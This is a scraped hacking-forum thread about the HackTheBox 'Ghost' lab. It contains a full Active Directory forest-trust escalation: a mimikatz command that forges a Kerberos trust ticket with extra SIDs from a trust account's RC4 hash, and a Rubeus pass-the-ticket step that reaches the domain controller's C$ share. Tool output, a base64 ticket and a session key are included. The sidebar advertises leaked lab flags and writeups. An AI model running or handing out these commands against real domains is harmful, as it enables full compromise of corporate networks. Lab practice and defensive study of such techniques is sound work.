[*]
    Directory: \\dc01.ghost.htb\C$
Mode                LastWriteTime        Length Name                                                               
----                -------------        ------ ----                                                               
d-----          5/8/2021  1:20 AM                PerfLogs                                                           
d-r---          2/2/2024  8:17 PM                Program Files                                                       
d-----          2/2/2024  8:16 PM                Program Files (x86)                                                 
d-r---          2/4/2024  1:48 PM                Users                                                               
d-----        7/10/2024  3:08 AM                Windows                                                             
[*]
Something's fucking wrong with `GHOST$` account on the `PRIMARY` host

[*]Notice the user and SID that I set
[*]
If it's a golden ticket attack, it must use rc4 hash of the `krbtgt` account.
But in this case, rc4 hash must be of `GHOST$` account. Why is that?
is that because the `GHOST$` account is a trust account across the forest?
So this isn't technically a golden ticket attack, but rather modified one?
I bet this was misconfigured in the first place, but so many questions Huh

Technically, this's not a "Golden Ticket".. this's rather an abuse of the misconfigured " Domain trust" relationships.
In this case we're able to escalate from one Domain Admin (local admin in this case) to Enterprise Admins.
Which lead to a full Forest compromise and this CORP is simply finished of... mimikatz just don't know about "Forest Trusts" compromises.

[Image: cs2.png]
Reply
Banned

Posts: 103
Threads: 1
Joined: Nov 2023
Reputation: -1
#160
Jul 18, 2024, 03:28 AM
(Jul 17, 2024, 09:16 PM)mazafaka555 Wrote:
(Jul 17, 2024, 12:48 PM)floridaman389 Wrote:
[*]mimikatz # kerberos::golden /user:blahblah /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-000000000 /sids:S-1-5-21-4084500788-938703357-3654145966-512 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden_trust.kirbi
User      : blahblah
Domain    : CORP.GHOST.HTB (CORP)
SID      : S-1-5-21-2034262909-2733679486-000000000
User Id  : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-4084500788-938703357-3654145966-512 ;
ServiceKey: dae1ad83e2af14a379017f244a2f5297 - rc4_hmac_nt     
Service  : krbtgt
Target    : GHOST.HTB
Lifetime  : 7/17/2024 5:53:18 AM ; 7/15/2034 5:53:18 AM ; 7/15/2034 5:53:18 AM
-> Ticket : golden_trust.kirbi

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Final Ticket Saved to file !

mimikatz # exit
Bye!

[*]
PS C:\tmp> .\Rubeus.exe asktgs /ticket:C:\tmp\golden_trust.kirbi /service:cifs/DC01.ghost.htb /dc:DC01.ghost.htb /ptt /nowrap


  ______        _                     
  (_____ \      | |                   
  _____) )_  _| |__  _____ _  _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|  |_|____/|____/|_____)____/(___/

  v2.2.1

[*]Action: Ask TGS
[*]Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*]Building TGS-REQ request for: 'cifs/DC01.ghost.htb'
[*]Using domain controller: DC01.ghost.htb (10.10.11.24)
[+] TGS request successful!
[+] Ticket successfully imported!
[*]base64(ticket.kirbi):
      doIE4DCCBNygAwIBBaEDAgEWooID5jCCA+JhggPeMIID2qADAgEFoQsbCUdIT1NULkhUQqIhMB+gAwIBAqEYMBYbBGNpZnMbDkRDMDEuZ2hvc3QuaHRio4IDoTCCA52gAwIBEqEDAgEEooIDjwSCA4uUm2GHe+QiunyvwObke214RLSfN/sKQfarCVWTZFb+sUJ9Ob/tgWhIWX5zDbEF8EW/JQX+dQwsprV+XkuBYXg/7efPCc3hltPEBR0u3x0xz9reiPsYKvwY/66er6XX72ueSjI+8T/z6RrevFT0TaeS8tGbM9KgmJ+y0tUTRHTKjc1sy0LNJ3JmFQ9SqWw9UuDwUE3EhLQ1qlvBqmCo5x4oonurAiNCOquCzJc8mbX4cQiHvoR/xExfURajPee3XIHfvI1p7VIMGOLBIn96NGtWSAFRWfIEkTans5sk3/W/dZ6nM0w5focHADV6GFZSRps5r3a3GAgiNzyQymt+q9lYBvOCld8Vsn/vyZGAhyyOsphF0a2rLnXH3MQzcE8H1G3lgM9rf0xU6zDv9gMwvpVy3PBzpp/7V7EqP3owZ15unXWJ/L6WpMwxKshj6aV2Iy0V9a2vC5vhUVx9xtZRktPJTAsWU22FaLrbi27C30dIp0YPzieBJBZq5hGOGELW7GPLevYcsnJi8SgEtCaeEDtq+4HKHklLlLvkcZcpGXym5YAiFx8+6KoSt1WVClf6l73zNS23vIF7sIxxdMAXxm7t0UqD03s3mQaiIjZjcCbN1xNW6mZpFBiNTjVYRqOGgYozr+SR05mXz2Oz008SR4Gy4CLxRmZOVvTen7XS6xNMHeO/U8+qSJonZv+fncSyzlb4mAqsm+cLr858RSYEKbCRl+jwyYTdTtxdqgCP3gHBCVtbqTHnv7uWEb3ipEgHX0DfpevGFBEcuTSCH9c267Dfj8OwnGFCerp45GeQa+umoM5UNPxSVi0Q7NErcLopzKVeOzR9L8le2F2n7flog4RGaBdvWgxOKJb7eaGglXvloNGkVhiXBxjcdOf2S1eR5dS2EMaufAyXV6/tL+LatBtiNJuy3ar9cN13Y8ZnGHLzI+IMHyflQP3hqbuLpwsvRpqx4kl4zkn4E0w2/nNEptLF5h9sh+K6NmnvA8ENbXBXVX12a9JaGBM9zW6n1an0t1AShBXdpxfOISlQqUkypgAMRC/oqwiQfu+PmLvTZNc42TsZaRfX6DIWadoR3SvvRmGbUgiFB0LaLBh6vEO9+2sNTnrS1cWtU/fYIg+cUjKfq2Q1jq6VD63p3WSo9Kb72Xa0XbNgKI97GpjNpyUgPIm7Ynbfj3mHU2Yt9ciMEoLA+XqMGPOUbFvLoZ2po4HlMIHioAMCAQCigdoEgdd9gdQwgdGggc4wgcswgcigKzApoAMCARKhIgQgFFZuLFXPRiMmm20Qf21jMAGKTdyRWI0ijpLGdtmdiO+hEBsOQ09SUC5HSE9TVC5IVEKiFTAToAMCAQGhDDAKGwhibGFoYmxhaKMHAwUAQKUAAKURGA8yMDI0MDcxNzEyNTMzN1qmERgPMjAyNDA3MTcyMjUzMzdapxEYDzIwMjQwNzI0MTI1MzM3WqgLGwlHSE9TVC5IVEKpITAfoAMCAQKhGDAWGwRjaWZzGw5EQzAxLmdob3N0Lmh0Yg==
  ServiceName              :  cifs/DC01.ghost.htb
  ServiceRealm            :  GHOST.HTB
  UserName                :  blahblah
  UserRealm                :  CORP.GHOST.HTB
  StartTime                :  7/17/2024 5:53:37 AM
  EndTime                  :  7/17/2024 3:53:37 PM
  RenewTill                :  7/24/2024 5:53:37 AM
  Flags                    :  name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  FFZuLFXPRiMmm20Qf21jMAGKTdyRWI0ijpLGdtmdiO8=

PS C:\tmp> ls \\dc01.ghost.htb\C$
[*]
    Directory: \\dc01.ghost.htb\C$
Mode                LastWriteTime        Length Name                                                               
----                -------------        ------ ----                                                               
d-----          5/8/2021  1:20 AM                PerfLogs                                                           
d-r---          2/2/2024  8:17 PM                Program Files                                                       
d-----          2/2/2024  8:16 PM                Program Files (x86)                                                 
d-r---          2/4/2024  1:48 PM                Users                                                               
d-----        7/10/2024  3:08 AM                Windows                                                             
[*]
Something's fucking wrong with `GHOST$` account on the `PRIMARY` host

[*]Notice the user and SID that I set
[*]
If it's a golden ticket attack, it must use rc4 hash of the `krbtgt` account.
But in this case, rc4 hash must be of `GHOST$` account. Why is that?
is that because the `GHOST$` account is a trust account across the forest?
So this isn't technically a golden ticket attack, but rather modified one?
I bet this was misconfigured in the first place, but so many questions Huh

Technically, this's not a "Golden Ticket".. this's rather an abuse of the misconfigured " Domain trust" relationships.
In this case we're able to escalate from one Domain Admin (local admin in this case) to Enterprise Admins.
Which lead to a full Forest compromise and this CORP is simply finished of... mimikatz just don't know about "Forest Trusts" compromises.

[Image: cs2.png]

wtf,man , why can you jump , i can't jump,please show the command T_T

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 375 93,471 1 minute ago
Last Post: Johe
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 604 92,577 2 minutes ago
Last Post: Johe
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 27 2,803 7 minutes ago
Last Post: Johe
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 87 7,978 1 hour ago
Last Post: char0n1507
Heart [FREE] HackTheBox All Cheatsheets Tamarisk 9 565 1 hour ago
Last Post: char0n1507

Forum Jump:


 Users browsing this forum: 1 Guest(s)